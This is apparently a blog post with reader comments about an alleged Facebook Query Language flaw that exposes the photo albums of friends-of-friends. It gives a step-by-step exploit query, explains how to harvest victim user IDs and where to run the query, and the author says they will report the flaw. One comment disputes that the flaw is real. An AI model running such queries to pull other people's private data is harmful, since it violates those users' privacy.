Last weekend I was lucky to notice on line “hacker” challenge - Miracle on Thirty-Hack Street . I tough let me try this challenge …I start solving the puzzle and then I got more than a solution of the task. Final conclusion was the following : I have no privacy from FQL developers on Facebook ( anyone with Facebook account can use FQL ) . They can see my data without being in my friend list … :( .
Let say there are Person A, Person B, Person C, Person D, Person E … on facebook and they are connected on the following way :
Person A is friend with Person B, but not with Person C, Person D and Person E
Person B is friend with Person C, but not with Person D and Person E
Person C is friend with Person D, but not with Person E
Person D is friend with Person E
…
All of the persons are standard Facebook users, they don't have any mandatory applications installed on their accounts and they have locked their profiles to be viewed only by their friends.
This means that Person A can see the informations only for Person B.
“<=>” - can see profile and shared informations.
Person B <=> Person C
Person C <=> Person D
Person D <=> Person E
What does security flaw allow Person A. With the current security setting on FQL ( Facebook Query Language ) Person A is allowed to see the all informations from Person C, Person D and Person E !!!
Wow this is a huge security flaw that guide us to the conclusion: I don't have privacy from all of the Facebook developers that use FQL !!!. They are able to create FQL statement that will provide them my Facebook informations if they manage to find/create lane described on the image above. Then I understand that all of the friends of my friends that understands FQL can see all of my protected data …
Proof of the previous:
Let say I'm Person A and I'm a friend from the above with Person B. I'm not friend with Person C but I want to see his data : His status messages, his photo albums and pictures, notes, …All I need then is the following – ID numbers of their accounts.
What is ID of the account / user. Facebook url have the following structure www.facebook.com/profile.php?ref=name&id=this_number_is_user_id and can be viewed by everyone. Just go to the Person B friend list and mouse over the Person C link. In the status bar of the browser you will be able to his/her user_ID. Now when I have the the needed info I can do the following :
info I have :
Person A : user_A_id
Person B : user_B_id
Person C : user_C_id
I want to see Person C albums if there are any. After executing the following FQL i'll have the needed informations :
select aid, cover_pid, name, created, description, location, size, link, visible, typefrom album where owner in( select uid1 from friend where uid1 =user_C_id ( this is the victim and I want his data without being friend ) and uid2 in ( select uid1, uid2 from friend where uid1 = user_A_id ( this is me ) and ( uid2 = user_B_id ( this is my friend ) or uid1 = user_B_id ( this is my friend ) ) ))
Perfect !!!
I have the Person C photo albums id's so now I can create statement for getting victims images in it.
Note: Permissions on the albums doesn't change nothing!!!( I can't see the profile from a browser or get any info from it - just add as friend )
What does this mean. I can take absolutely all of the data from Person C only because facebook understands the following :
I have valid session for executing query because I have included mine ID and perform allowed query for my friend Person B, but platform doesn't check that I have included forbidden resource. ( yup I can't discover from facebook frontend )
Then I can access only allowed data ( mine and allowed data from my friends ) - fail ! I can take Person C data. ( yup I can't see anything from the FB web interface )
With the previous statement I connect uid from the albums table with the uid of the victim. Now this is example with Person A, Person B and Person C, but previous example give us way to make/find unlimited lane of users and get their personal info not shared with us.
For extra informations for testing I'll point all of you at this pages :
http://wiki.developers.facebook.com/index.php/FQL_Tables
and ofc tool for testing trying the FQL statements.
http://developers.facebook.com/tools.php ( API test console and choose method fql.query ). Write your query in text area and see your results.
At this moment I'm going to poke the FB service for this security flaw, so they can make reaction and we can “live” in more safe community without mean web developers look everyone photos :) .
I cannot believe this will work!
can be done by modifying a web url as well ...not just through fql
yes the article raises the concerns of the new privacy feature but no its not a security issue as its based around settings and requires a half trusted connection i.e. they are still a friend of a friend you cant create an account and just visit someones protected information you require a base link
Great idea, thanks for this tip!
I tested, while it returns results, I'm not sure its highlighting a permissions issue with Facebook. I can still only see albums set with 'Everyone' and Friends of Friends permissions, and cannot see ones where settings are correct.
Are you publishing all of your code?